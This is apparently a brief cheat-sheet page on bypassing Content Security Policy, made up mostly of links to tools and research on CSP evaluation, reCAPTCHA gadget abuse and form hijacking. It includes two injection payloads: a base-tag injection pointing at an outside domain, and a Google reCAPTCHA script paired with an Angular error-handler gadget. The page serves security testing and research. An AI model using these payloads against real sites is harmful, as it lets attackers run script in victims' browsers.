CSP Bypass

CSP Evaluator

CSP Evaluator

CSP Bypass

CSP Bypass Search

Weak CSP Bypass

1'"--><Base Href=//X55.is?

Credits: @KN0X55

GitHub - renniepak/CSPBypassGitHub

CSP Bypass Search

Recaptcha Abuse

<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>

CSP bypass on PortSwigger.net using Google script resources - Johan CarlssonJohan Carlsson

Form Hijacking to bypass CSP

Using form hijacking to bypass CSPPortSwigger Research

Resources

Content Security Policy (CSP) Bypass | HackTricks